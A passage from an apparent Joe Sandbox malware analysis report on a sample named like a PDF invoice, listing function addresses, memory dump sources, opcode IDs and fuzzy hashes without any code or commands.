                                                                                      • Opcode ID: dc8eef354748d5743255908777c13126bbd25a9549cdd40ad6a972c8f07b5eac
                                                                                      • Instruction ID: f4e1a91265e1124141338751a4acc4e8df060c990e958e93c1d6c2f781b683b9
                                                                                      • Opcode Fuzzy Hash: dc8eef354748d5743255908777c13126bbd25a9549cdd40ad6a972c8f07b5eac
                                                                                      • Instruction Fuzzy Hash: 26E07574E05208EFCB94DFE8D5456ACBBF4FB48314F10C5A9985893351D635AA42DF81
                                                                                      Function 065C25C6 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: be2dcbb3dc04b5f2b73b4dca135486680a6bf2d0a8f6db691f705649ee6af5f4
                                                                                      • Instruction ID: b689048d29b325ab0d1935678a18aeb75271777415b3b0762f2cfa9e83816416
                                                                                      • Opcode Fuzzy Hash: be2dcbb3dc04b5f2b73b4dca135486680a6bf2d0a8f6db691f705649ee6af5f4
                                                                                      • Instruction Fuzzy Hash: BAE04F74909208EFC724DF94D9459AEBFB8EB99310F10809DAC0457355C632AE92DA95
                                                                                      Function 065C1958 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 07bb9047b7cbe75bd44d787fdae6484581b2f8388f357318b5f9ab668f90b3b2
                                                                                      • Instruction ID: 6d689d5aa1243e2bedc19f3597b3d0f9a20ad9117fc0d013450d2c02b016b1e8
                                                                                      • Opcode Fuzzy Hash: 07bb9047b7cbe75bd44d787fdae6484581b2f8388f357318b5f9ab668f90b3b2
                                                                                      • Instruction Fuzzy Hash: E7E0C274D09208AFCB94DBA8D5446ACBBF4AB49210F14C0AA985893352D6359A42DF80
                                                                                      Function 065C91E8 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 55c0a12cb842ed6909fa2417abf7927169891950bd22b422fae95c81dd865adb
                                                                                      • Instruction ID: e397927b16236067948a028ec2591824c12de50d5ebcd245413e43c702048d8d
                                                                                      • Opcode Fuzzy Hash: 55c0a12cb842ed6909fa2417abf7927169891950bd22b422fae95c81dd865adb
                                                                                      • Instruction Fuzzy Hash: D1E0E534909208EFCB04DF94D945DADBBB5FB49310F10909DAC1917361D6329A62EB90
                                                                                      Function 0676C4C0 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 08de150777df6dae07353ec073ec0eb6e767d45312db8446445d07c183bd9cb9
                                                                                      • Instruction ID: 1d53901ae4bbb3a9db36c089d14aa760ce88d488ee632edba32444cdcf3ea88e
                                                                                      • Opcode Fuzzy Hash: 08de150777df6dae07353ec073ec0eb6e767d45312db8446445d07c183bd9cb9
                                                                                      • Instruction Fuzzy Hash: 48E0E574E05208EFCBA4DFA9D5446ACBBF4EB48300F10C0A99C58E3341D671AE42CF80
                                                                                      Function 06507218 Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0cb2a4d061d4ae7c0606c17fc99a3cb8b33600c758b73bd6aec56a04866e2a3e
                                                                                      • Instruction ID: 07b6b56ca1b4e1f700f03bf1532c35b14b886f4a9ddc2a0f496a535c8797f1fe
                                                                                      • Opcode Fuzzy Hash: 0cb2a4d061d4ae7c0606c17fc99a3cb8b33600c758b73bd6aec56a04866e2a3e
                                                                                      • Instruction Fuzzy Hash: 54E0E574D09208EFCB54DFA8D944AACBBB4EB49310F10C0AAAC4853391D632AA52DB94
                                                                                      Function 06501848 Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5d14cec14b60f8e87bd1777daa1a5c9e28d2fae8e1651b849ef9cae2c356b125
                                                                                      • Instruction ID: eca16f8a96352a5a69e9833b89746bf1b0ed74a061a7f5bae125abf51e2ad571
                                                                                      • Opcode Fuzzy Hash: 5d14cec14b60f8e87bd1777daa1a5c9e28d2fae8e1651b849ef9cae2c356b125
                                                                                      • Instruction Fuzzy Hash: C8E04F74909208EBC754DFD4D9409ADBBB8AF49310F108099984467381C6319A42DB95
                                                                                      Function 065C8A60 Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 93470e0ff25043dc439435648d13f01d464e5a5bcd0b9e573c40e22b4a7d2688
                                                                                      • Instruction ID: 4caaed9efe8824ceffcc384dcc281c3e7b9158786bf2912f581d580a1922fb3f
                                                                                      • Opcode Fuzzy Hash: 93470e0ff25043dc439435648d13f01d464e5a5bcd0b9e573c40e22b4a7d2688
                                                                                      • Instruction Fuzzy Hash: 1CE08674909208EFC744DFD4D940ABDBFB9AB89321F10C0ADDC4497391C631AE42EB94
                                                                                      Function 066A8D60 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 677b6109690f6f88d10f1bc3033971d9d325f4c0de468104c6154821d721fb57
                                                                                      • Instruction ID: 62ea0993a2e8053346a26cba06ff34df7f412f25bc5280f93ca7b8348fc31f70
                                                                                      • Opcode Fuzzy Hash: 677b6109690f6f88d10f1bc3033971d9d325f4c0de468104c6154821d721fb57
                                                                                      • Instruction Fuzzy Hash: 04E0B674905208EFC794EFA8D9456ACBBF4AB58214F2080AE9C08D3351E732AE52CB91
                                                                                      Function 069B8C20 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 62ad9592bf747dc21ff0bffa55acf3c302c503fdd3b6c981bc80f92e07aa829e
                                                                                      • Instruction ID: 8c11f3b5c83003e62e36b8dcaf74190650a0691f9af459eaddb9634011d1420c
                                                                                      • Opcode Fuzzy Hash: 62ad9592bf747dc21ff0bffa55acf3c302c503fdd3b6c981bc80f92e07aa829e
                                                                                      • Instruction Fuzzy Hash: DAE01A74D0920CEFCB54DB98D6415ACBBB8AB49204F1081E9985853341C6319E42DB80
                                                                                      Function 065C2778 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f73eb9061c300d1814812c2042899e17101c4e35de7870f690755274ba59f940
                                                                                      • Instruction ID: 8df36e896ec5f1cb9a1b9df9373b56c2a68534d7abcc48b523c4672b785324df
                                                                                      • Opcode Fuzzy Hash: f73eb9061c300d1814812c2042899e17101c4e35de7870f690755274ba59f940
                                                                                      • Instruction Fuzzy Hash: 39E04F74909208EFC754EF94D9809ACBBB4AB59320F10C09D9C0417351D632AE52EA94
                                                                                      Function 065C25C8 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f73eb9061c300d1814812c2042899e17101c4e35de7870f690755274ba59f940
                                                                                      • Instruction ID: 6da6af23853c8d14fa8af0b14b1c4d02e3d31d0f93daf2a04c0a8db896d730ec
                                                                                      • Opcode Fuzzy Hash: f73eb9061c300d1814812c2042899e17101c4e35de7870f690755274ba59f940
                                                                                      • Instruction Fuzzy Hash: 49E04674909208EFCB14DF94D9409ADBBB8AB59320F2080AD9C0467355C632AE52DA94
                                                                                      Function 065C2DA0 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f73eb9061c300d1814812c2042899e17101c4e35de7870f690755274ba59f940
                                                                                      • Instruction ID: 016bbdb2977c9f0308277857dac824cda46b2424596d8e0f8e3a629f0adaddde
                                                                                      • Opcode Fuzzy Hash: f73eb9061c300d1814812c2042899e17101c4e35de7870f690755274ba59f940
                                                                                      • Instruction Fuzzy Hash: AFE04638909208EFCB04DF94D9409ACBBB5AF59320F1080A9DC0463351C672AE52DA94
                                                                                      Function 065C2B48 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3b714e0e53807dd3dc36f0de6104bebb006ba4b7d1fe3a3319c5701593147d64
                                                                                      • Instruction ID: 91cb37640903ba05d811d6909306896d1056b8bf8dc4b8df900ec38e0abf8d69
                                                                                      • Opcode Fuzzy Hash: 3b714e0e53807dd3dc36f0de6104bebb006ba4b7d1fe3a3319c5701593147d64
                                                                                      • Instruction Fuzzy Hash: FCE09A74D05208EFC754DFD8D5415ACBBB4EB48314F10C1AD984897351D631AE52DB85
                                                                                      Function 065C3BC0 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e04d14a7607365ed28b48a3bee0e96d693cf11e33eb3049811382b03fd01df3a
                                                                                      • Instruction ID: 3da2edca0c243d5c42fc6f4d08fa352b6e70779d2cd9389f14f4fc65de685373
                                                                                      • Opcode Fuzzy Hash: e04d14a7607365ed28b48a3bee0e96d693cf11e33eb3049811382b03fd01df3a
                                                                                      • Instruction Fuzzy Hash: 76E01A34D0920CEFC754DBD8D5405ACBBB4AB48214F10C0ED985853341C6399A42DB80
                                                                                      Function 06762711 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 19b9a7087b3464fb9f313eaf985c9fb571f97e4a10f84b73944172d8ee45550a
                                                                                      • Instruction ID: cb02b9abb6f6137676bf65d19431dbab5ba2bef6930ce42253e4de4a20c3a42c
                                                                                      • Opcode Fuzzy Hash: 19b9a7087b3464fb9f313eaf985c9fb571f97e4a10f84b73944172d8ee45550a
                                                                                      • Instruction Fuzzy Hash: 94D0A73570012C6B8AD4515B69809FB7BCDCBC51667308026FE1DC7341DE12CC0242F6
                                                                                      Function 0676E5B9 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0b42d0e14a2f0fb9f93acebcc13446e8d5c8cdf76aca80e502db9ab1cb6e429f
                                                                                      • Instruction ID: 8a38a67623fbd34e0392ba6ac3a63d57c426dd6d44759c9d8c7207eef8fb277b
                                                                                      • Opcode Fuzzy Hash: 0b42d0e14a2f0fb9f93acebcc13446e8d5c8cdf76aca80e502db9ab1cb6e429f
                                                                                      • Instruction Fuzzy Hash: F9E04834909208DBC764DF95D54167CFBB8EB45304F10D19DEC0967356D731AD86CB90
                                                                                      Function 0676EA00 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7f0060fcf76d256877d7a1afe9169edca42acd5cc2ac49162dd9b05346b10160
                                                                                      • Instruction ID: 6a9cbb3f8ad185231e2bf22ec8f588bf9f4b15cc0dc556ea83abf26ed98a8178
                                                                                      • Opcode Fuzzy Hash: 7f0060fcf76d256877d7a1afe9169edca42acd5cc2ac49162dd9b05346b10160
                                                                                      • Instruction Fuzzy Hash: 4FE0BF74909208DFC794DFA8D5456ACBBF4AB48214F2080A99C09D7351D6319E42CB51
                                                                                      Function 0676C818 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f7c83c17eab709de27f7c4641b2db8c1910b2feb699a380adeea11b1e499f0aa
                                                                                      • Instruction ID: cb334de50853af293ae316f8a7ec63344b344065b6e272a8707eb5f9c6a86917
                                                                                      • Opcode Fuzzy Hash: f7c83c17eab709de27f7c4641b2db8c1910b2feb699a380adeea11b1e499f0aa
                                                                                      • Instruction Fuzzy Hash: 0DE01A34D09208EFC754DFD9D5405ACBBB4AB48200F10C0E99C4853351C6359A42DB80
                                                                                      Function 0650E308 Relevance: .0, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: da9441c463a5fe55b8c2c3468f9c077d7e7d2069bd0db8219e8ceed13b585fe0
                                                                                      • Instruction ID: 2b9edc7a67bb15c3052eba3e756781983e36665b114412253348e7c061043873
                                                                                      • Opcode Fuzzy Hash: da9441c463a5fe55b8c2c3468f9c077d7e7d2069bd0db8219e8ceed13b585fe0
                                                                                      • Instruction Fuzzy Hash: 5CE0EC70D1620CDFD790DFA8D5456ACBFF8BB08201F6045A9D84993360EA30AA50CB91
                                                                                      Function 066A64D0 Relevance: .0, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dcc6d8da069e4a70d9565b7f0e0ce838026a40bc940483ab5ba63e7cb28ad4f6
                                                                                      • Instruction ID: 70aedb93202cfb83c6bfaf4626ef36df84190ba7520e022f8b5d6b14fdad5197
                                                                                      • Opcode Fuzzy Hash: dcc6d8da069e4a70d9565b7f0e0ce838026a40bc940483ab5ba63e7cb28ad4f6
                                                                                      • Instruction Fuzzy Hash: A2E012B194120CEBC765EBF5C901A9E7BF8DB45210F5044AA9505D7211EE315A00E7A2
                                                                                      Function 069BFC80 Relevance: .0, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6becedae03709fbdb3f24bdf7a2ed7d07f3307282a2536f616c3846fa5a22022
                                                                                      • Instruction ID: c2047275c784732b47995a3ee26eec9436d6766e689ff0c439cf0114d46793c9
                                                                                      • Opcode Fuzzy Hash: 6becedae03709fbdb3f24bdf7a2ed7d07f3307282a2536f616c3846fa5a22022
                                                                                      • Instruction Fuzzy Hash: A0E012B184210CEBCB55EBF5C905A9E7BF8DF45300F5045A69505D7111EE315A40E7B2
                                                                                      Function 069BE4D0 Relevance: .0, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 109a046dcd39b78078cbbea624a8449f840d368000f8104cffedd446c6073709
                                                                                      • Instruction ID: 20f3deb4fbed89c7ba275eb8e1a736ffdaf2f13f6e9e945761685ad87e5dc320
                                                                                      • Opcode Fuzzy Hash: 109a046dcd39b78078cbbea624a8449f840d368000f8104cffedd446c6073709
                                                                                      • Instruction Fuzzy Hash: 47E01234A09208DBC758DFA4EA419ECBBB9EB45314F2091D9EC0857351C632AE46DB95
                                                                                      Function 069BB938 Relevance: .0, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f892999612440294c328f508ff295173962f5aca2c3487a3131fdb142d190009
                                                                                      • Instruction ID: ba4c663905b4f58a4f1a4177f3a00f29b7cd6e7d5b3d9c547b153739f9b353e2
                                                                                      • Opcode Fuzzy Hash: f892999612440294c328f508ff295173962f5aca2c3487a3131fdb142d190009
                                                                                      • Instruction Fuzzy Hash: 63E012B184210CEBCB55EFF8DA01A9D7BF8DB45315F5054AAD40597151EE315A00A7A2
                                                                                      Function 065C85F9 Relevance: .0, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 888387a53b1c5a94a9bd8cf63355a17590bd98b14ab4f71f171d0f2f5971cb2d
                                                                                      • Instruction ID: bf7a31a3fa85242d7f8df30510c8a856d581b802d980dce0b3e0a995ad822f64
                                                                                      • Opcode Fuzzy Hash: 888387a53b1c5a94a9bd8cf63355a17590bd98b14ab4f71f171d0f2f5971cb2d
                                                                                      • Instruction Fuzzy Hash: C3E0DF34409184CFE7508B44C48C6DCBF74FF0A310F2410CCC489AB126CAB45882DF51
                                                                                      Function 06760CAF Relevance: .0, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 160b48847f77966873a3e1289ad28088e14efafa6f899c5e9e77750544ff8c96
                                                                                      • Instruction ID: 1f6523f0aa2c75b4db7ebd573df6ecd90af21883fbd39eba397fb24726571b43
                                                                                      • Opcode Fuzzy Hash: 160b48847f77966873a3e1289ad28088e14efafa6f899c5e9e77750544ff8c96
                                                                                      • Instruction Fuzzy Hash: 90D05E2130B2502F8B425A2E7D9888ABF65AA8612636083EBF116C31E2CA04890A8294
                                                                                      Function 0676E5C8 Relevance: .0, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 42a0c143b22a387ed2b920b7fb0c47c5170e0861e798dee0e6fce6d994850903
                                                                                      • Instruction ID: 9093603c4330ba92fea889720bd458be088c3ed6328225cda1ead21ceffe4dd4
                                                                                      • Opcode Fuzzy Hash: 42a0c143b22a387ed2b920b7fb0c47c5170e0861e798dee0e6fce6d994850903
                                                                                      • Instruction Fuzzy Hash: 72E0C23890D208DBC704DF94D9409BCBBB8EB45300F20C0DCEC0853342DA32AE82CB90
                                                                                      Function 00D750A8 Relevance: .0, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0311a30fc6e999cba01c7b17a0bec893b3af95da7d7edff0c910e8252f905cb7
                                                                                      • Instruction ID: 79078477f9a4cfec67f5baa82a6f22424ab9ff77de6f1828e01c0a10a1ff3198
                                                                                      • Opcode Fuzzy Hash: 0311a30fc6e999cba01c7b17a0bec893b3af95da7d7edff0c910e8252f905cb7
                                                                                      • Instruction Fuzzy Hash: 9CE0C2749053688FDB60DF28D9487D8BBB2AF99310F0000DAE14DA2251DB320ED1CF52
                                                                                      Function 00D763F2 Relevance: .0, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 61490707570f4a159f0256ddd1c985ab3221caebaac74c4f1342a30d6d7bb505
                                                                                      • Instruction ID: 4cd35297b3a40c3ea04b83c3c49d5cd7abe37837263ad98fc0758ce5c8837c8a
                                                                                      • Opcode Fuzzy Hash: 61490707570f4a159f0256ddd1c985ab3221caebaac74c4f1342a30d6d7bb505
                                                                                      • Instruction Fuzzy Hash: 1BF0E6B89042A98FDB64CF28D9546DCBBB1EB59300F1085EA980DA3250DA705E828F55
                                                                                      Function 066AAD40 Relevance: .0, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
